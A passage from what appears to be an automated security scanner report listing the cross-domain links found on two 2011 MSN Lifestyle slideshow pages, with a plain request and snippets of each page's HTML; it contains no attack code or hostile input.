<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660834&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-life%2Fnew-year-new-you%2Farticle.aspx%3Fcp-documentid%3D25037350%26gt1%3D32060&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.esquire.com?link=lgo&dom=msn&tpc=Other&src=syn&con=art&mag=esq"><img src="http://blstb.msn.com/i/53/A14E61E783965B8A27020434A4C86.jpg" width="90" height="30" alt="Esquire" />
...[SNIP]...
<li><a href="http://www.esquire.com/features/75-things-0808?link=msn%3A75%20Things%20to%20Do%20Before%20You%20Die%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq">75 Things to Do Before You Die</a>
...[SNIP]...
<li><a href="http://www.esquire.com/women/10-things-you-dont-know-about-women/relationship-advice-for-men?link=msn%3AImportant%20Things%20Men%20Don%27t%20Know%20About%20Women%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq">Important Things Men Don't Know About Women</a>
...[SNIP]...
<li><a href="http://www.esquire.com/the-side/video/dr-oz-workout-0509?link=msn%3AGet%20Thin%20in%207%20Minutes%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq">Get Thin in 7 Minutes</a>
...[SNIP]...
<li><a href="http://www.esquire.com/features/movies/best-movies-ever-0609?link=msn%3AThe%20Best%20Movies%20of%20All%20Time%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq">The Best Movies of All Time</a>
...[SNIP]...
<li><a href="http://www.esquire.com/women/funny-joke-from-a-beautiful-woman/hot-actress-photo-gallery-070909?link=msn%3AFunny%20Jokes%20from%20Beautiful%20Women%5FHow%20to%20Be%20Luckier&dom=msn&tpc=Other&src=syn&con=art&mag=esq">Funny Jokes from Beautiful Women</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx?cp-documentid=25037350&OCID=TWT">Tweet</a>
...[SNIP]...
</script><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js" xmlns="http://www.w3.org/1999/xhtml"></script>
...[SNIP]...
'1');" href="http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx?cp-documentid=25037350&gt1=32060&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
href="http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx?cp-documentid=25037350&gt1=32060&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div><script language="javascript" src="http://subscribe.hearstmags.com/circulation/shared/scripts/validate-functions.js"></script><script language="javascript" src="http://subscribe.hearstmags.com/circulation/shared/scripts/validate-generic.js"></script>
...[SNIP]...
<td align="left" valign="bottom" bgcolor="#F6EDB8"><img src="http://subscribe.hearstmags.com/circulation/esquire/images/esq_msnemb01T_h_more.gif" width="585" height="63" /></td>
...[SNIP]...
<td width="175"><img src="http://subscribe.hearstmags.com/circulation/shared/images/omn_x.gif" width="175" height="1" /></td><td width="19"><img src="http://subscribe.hearstmags.com/circulation/shared/images/omn_x.gif" width="19" height="1" /></td></tr><tr><td width="175" height="200" align="center" valign="top"><img src="http://subscribe.hearstmags.com/circulation/esquire/images/esq_cvr-reg.jpg" width="151" height="200" /></td>
...[SNIP]...
<td colspan="2" align="left" valign="top"><img src="http://subscribe.hearstmags.com/circulation/esquire/images/esq_msnemb01T_u.gif" border="0" usemap="#Hearst_MSN" /></td>
...[SNIP]...
<td width="237" align="right" valign="middle"><img src="http://subscribe.hearstmags.com/circulation/shared/images/omn_x.gif" width="237" height="6" /><br />
...[SNIP]...
<td width="154" align="left" valign="top"><img src="http://subscribe.hearstmags.com/circulation/esquire/images/esq_msnemb01T_a_brand.jpg" width="154" height="302" /></td>
...[SNIP]...
<map name="Hearst_MSN" id="Hearst_MSN"><area shape="rect" coords="127,23,182,39" href="http://www.hearstmags.com" target="_blank" /><area shape="rect" coords="0,23,11,39" href="http://www.hearstmags.com" target="_blank" /><area shape="rect" coords="0,42,183,57" href="https://subscribe.hearstmags.com/subscribe/splits/esquire/esq_f_gift" target="_blank" /><area shape="rect" coords="0,61,85,76" href="http://privacy.hearstmags.com" target="_blank" /></map>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<br />Find out how Martha brings style to the table. Create place cards that wow your guests using new text and visual effects in <a href="http://www.marthastewart.com/photogallery/microsoft-custom-templates#slide_10"><strong>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

17.128. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/celebrity-style/staticslideshowmc.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx?cp-documentid=26869207&gt1=32002

The response contains the following links to other domains:

http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_MAR_585X368
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/MSN_Style
http://twitter.com/share
http://www.bing.com/?FORM=MSNS23
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24
http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24
http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/MSNLife
http://www.marieclaire.com/?link=lgo&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar
http://www.marieclaire.com/celebrity-lifestyle/celebrities/exclusives/kate-middleton-royal-style?link=msn%3AKate%20Middleton%27s%20Royal%20%20Style%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar
http://www.marieclaire.com/fashion/fashionista-blog/celebrities/Monique-Lhuillier-bridal-2010?link=msn%3AMonique%20Lhuillier%20Bridal%20%202010%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar
http://www.marieclaire.com/fashion/fashionista-blog/celebrities/carolina-herrera-bridal-2010?link=msn%3ACarolina%20Herrera%20Bridal%202010%3A%20Artfully%20%20Masterful%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar
http://www.marieclaire.com/fashion/wedding-planning-style-tips?link=msn%3AOne%20Fine%20%20Day%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar
http://www.marieclaire.com/world-reports/queen-middleton?link=msn%3ACould%20This%20Woman%20Be%20The%20Next%20%20Queen%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660809&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-look%2Fcelebrity-style%2Fstaticslideshowmc.aspx%3Fcp-documentid%3D26869207%26gt1%3D32002&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-look/celebrity-style/staticslideshowmc.aspx?cp-documentid=26869207&gt1=32002 HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=801fabc5e12449e59ca18661999e6bb2; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4513AF504452425799ADD01E06611BF2; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 46080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660809&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.msn.com%2Fyour-look%2Fcelebrity-style%2Fstaticslideshowmc.aspx%3Fcp-documentid%3D26869207%26gt1%3D32002&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24">SAG awards</a>
...[SNIP]...
<li><a href="http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24">kim kardashian</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=henry+cavill+superman&form=MSNS24">next superman</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=kacey+jordan+spears+sitter&form=MSNS24">kacey jordan</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<div class="logo"><a href="http://www.marieclaire.com?link=lgo&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar"><img src="http://blstb.msn.com/i/70/3E1F5325C77F0D1856ED562284E.jpg" width="90" height="30" alt="Marie Claire" />
...[SNIP]...
<li class="first"><a href="http://www.marieclaire.com/celebrity-lifestyle/celebrities/exclusives/kate-middleton-royal-style?link=msn%3AKate%20Middleton%27s%20Royal%20%20Style%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar">Kate Middleton's Royal Style</a>
...[SNIP]...
<li class=""><a href="http://www.marieclaire.com/fashion/fashionista-blog/celebrities/Monique-Lhuillier-bridal-2010?link=msn%3AMonique%20Lhuillier%20Bridal%20%202010%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar">Monique Lhuillier Bridal 2010</a>
...[SNIP]...
<li class=""><a href="http://www.marieclaire.com/fashion/wedding-planning-style-tips?link=msn%3AOne%20Fine%20%20Day%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar">One Fine Day</a>
...[SNIP]...
<li class=""><a href="http://www.marieclaire.com/world-reports/queen-middleton?link=msn%3ACould%20This%20Woman%20Be%20The%20Next%20%20Queen%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar">Could This Woman Be The Next Queen?</a>
...[SNIP]...
<li class="last"><a href="http://www.marieclaire.com/fashion/fashionista-blog/celebrities/carolina-herrera-bridal-2010?link=msn%3ACarolina%20Herrera%20Bridal%202010%3A%20Artfully%20%20Masterful%5F20%20Fantasy%20Wedding%20Dresses&dom=msn&tpc=Bridal%2CBridal%20Fashion&src=syn&con=slide&mag=mar">Carolina Herrera Bridal 2010: Artfully Masterful</a>
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx?cp-documentid=26869207&imageindex=1&OCID=TWT">Tweet</a>
...[SNIP]...
ef="http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx?cp-documentid=26869207&gt1=32002&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
tp://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx?cp-documentid=26869207&gt1=32002&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<div class="child c1 first"><script src="http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_MAR_585X368" type="text/javascript"></script>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&q=">See more results</a>
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNS23"><span>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle" shape="rect" coords="245,1,277,25" /><area href="http://twitter.com/MSN_Style" alt="MSN Twitter" shape="rect" coords="279,3,300,25" /></map>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.msn.com&go=&form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.msn.com&go=&form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.msn.com&go=&form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.msn.com&go=&form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.msn.com&go=&form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.msn.com&go=&form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

17.129. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/everyday-style/staticslideshowglamour.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx?cp-documentid=27433131&gt1=32002

The response contains the following links to other domains:

http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.delish.com/?ocid=lifestylehp
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallifestyle.112.2o7.net/b/ss/msnportallifestyle/1/H.1--NS/0
http://twitter.com/MSN_Style
http://twitter.com/share
http://www.bing.com/?FORM=MSNS23
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=kim+kardashian&qpvt=kim+kardashian&form=MSNS24
http://www.bing.com/search
http://www.bing.com/search?FORM=ALS
http://www.bing.com/search?form=ALS&q=
http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=SAG+awards+2011&form=MSNS24
http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=ask+ying+site%3Alifestyle.msn.com&form=MSN037
http://www.bing.com/search?q=baby+names+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.msn.com&go=&form=MSN037
http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.msn.com&go=&form=MSN037
